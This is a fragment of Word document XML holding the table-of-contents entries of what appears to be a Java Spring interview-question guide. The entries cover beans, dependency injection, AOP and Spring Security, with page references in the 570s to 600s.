        <w:p w14:paraId="190B879E" w14:textId="3FFEF98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1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If I have prototype bean and singleton bean, then how can we call prototype beans inside singleton bean?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307919 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>574</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A5E685A" w14:textId="13A1680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2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are containers present in the spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307920 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>576</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42D62820" w14:textId="1E9743F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2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ransactions work in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307921 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>577</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CCE2EE4" w14:textId="277E56E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2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o you know the web.xml file? What is the significance of a web.xml file?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307922 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>580</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CE99D71" w14:textId="7BAD038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2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dependency injection?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307923 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>583</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2949F63B" w14:textId="6CCFCD2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2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are the different ways of injection?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307924 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>585</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15780AC8" w14:textId="31750F2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2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o will take care of objects in Spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307925 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>587</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="394249DD" w14:textId="455D4B9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2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ApplicationContext and its types in Spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307926 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>588</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F186765" w14:textId="6452C01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2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Filter and Interceptor in Spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307927 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>589</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26436BCE" w14:textId="1235BDF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2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ich one has access to spring beans, interceptors or filters?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307928 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>591</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="038B76B6" w14:textId="02CDC1D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2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y do interceptors have access to Spring beans?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307929 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>592</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1855D26D" w14:textId="3BCDF6E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3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Spring data JPA, Hibernate, JDBC, My batis?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307930 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>593</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F765CD1" w14:textId="3B31A65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3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y do we use Spring data JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307931 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>595</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AD380C2" w14:textId="349E64F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3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Can we have beans without bean id?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307932 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>597</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EFF9394" w14:textId="253D2B3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3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circular dependency?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307933 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>597</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DCD6D68" w14:textId="23BCADD9" w:rsidR="00012799" w:rsidRDefault="00012799">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307934" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring AOP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307934 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>600</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CEB040E" w14:textId="200BC5D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3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AOP in Spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307935 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>600</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F073553" w14:textId="1193E27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3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are JoinPoint, Advice, Pointcut, and Aspect?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307936 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>602</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42957962" w14:textId="2B315BE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3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difference between cross-cutting concern and business logic?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307937 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>603</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B5E8255" w14:textId="5785C866" w:rsidR="00012799" w:rsidRDefault="00012799">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307938" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307938 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>605</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73BAFFFF" w14:textId="588129B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3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Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307939 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>605</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67FBC30F" w14:textId="5405E4A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4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does Spring Security work internally?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307940 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>605</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4077062B" w14:textId="0727991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4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Authentication and Authorization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307941 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>605</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="313472CB" w14:textId="6EDB02F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4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role of UserDetailsService in Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307942 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>606</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4424A10D" w14:textId="05341E7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4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do you implement Role-Based Authorization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307943 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>606</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
